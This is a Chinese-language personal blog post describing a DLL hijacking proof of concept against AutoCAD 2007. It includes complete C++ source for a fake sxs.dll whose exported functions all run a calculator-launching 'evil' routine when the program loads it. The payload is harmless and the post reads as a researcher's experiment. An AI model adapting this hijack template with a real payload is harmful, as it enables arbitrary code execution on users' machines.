注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

sxs测试  

2014-01-24 14:33:33|  分类: 一些练习 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

做了个sxs的dll劫持poc,然后拷到cad2007的目录下,打开cad时跳出计算器。

可惜放在dwg文件旁双击dwg文件不能触发。如果做成hook到真正sxs那里去那就更好了。

//sxs.cpp

#include <windows.h>
//#define DLLIMPORT __declspec (dllexport)
#define DLLEXPORT extern "C" __declspec (dllexport)
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

DLLEXPORT void  Ordinal1() { evil(); }
DLLEXPORT void  SxsFindClrClassInformation() { evil(); }
DLLEXPORT void  SxsFindClrSurrogateInformation() { evil(); }
DLLEXPORT void  SxsLookupClrGuid() { evil(); }
DLLEXPORT void  SxsRunDllInstallAssembly() { evil(); }
DLLEXPORT void  SxsRunDllInstallAssemblyW() { evil(); }
DLLEXPORT void  SxspGenerateManifestPathOnAssemblyIdentity() { evil(); }
DLLEXPORT void  SxspGeneratePolicyPathOnAssemblyIdentity() { evil(); }
DLLEXPORT void  SxspRunDllDeleteDirectory() { evil(); }
DLLEXPORT void  SxspRunDllDeleteDirectoryW() { evil(); }
DLLEXPORT void  CreateAssemblyCache() { evil(); }
DLLEXPORT void  CreateAssemblyNameObject() { evil(); }
DLLEXPORT void  SxsBeginAssemblyInstall() { evil(); }
DLLEXPORT void  SxsEndAssemblyInstall() { evil(); }
DLLEXPORT void  SxsGenerateActivationContext() { evil(); }
DLLEXPORT void  SxsInstallAssemblyW() { evil(); }
DLLEXPORT void  SxsInstallW() { evil(); }
DLLEXPORT void  SxsOleAut32MapConfiguredClsidToReferenceClsid() { evil(); }
DLLEXPORT void  SxsOleAut32MapIIDOrCLSIDToTypeLibrary() { evil(); }
DLLEXPORT void  SxsOleAut32MapIIDToProxyStubCLSID() { evil(); }
DLLEXPORT void  SxsOleAut32MapIIDToTLBPath() { evil(); }
DLLEXPORT void  SxsOleAut32MapReferenceClsidToConfiguredClsid() { evil(); }
DLLEXPORT void  SxsOleAut32RedirectTypeLibrary() { evil(); }
DLLEXPORT void  SxsProbeAssemblyInstallation() { evil(); }
DLLEXPORT void  SxsProtectionGatherEntriesW() { evil(); }
DLLEXPORT void  SxsProtectionNotifyW() { evil(); }
DLLEXPORT void  SxsProtectionPerformScanNow() { evil(); }
DLLEXPORT void  SxsProtectionUserLogoffEvent() { evil(); }
DLLEXPORT void  SxsProtectionUserLogonEvent() { evil(); }
DLLEXPORT void  SxsQueryManifestInformation() { evil(); }
DLLEXPORT void  SxsUninstallW() { evil(); }


 

  评论这张
 
阅读(188)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017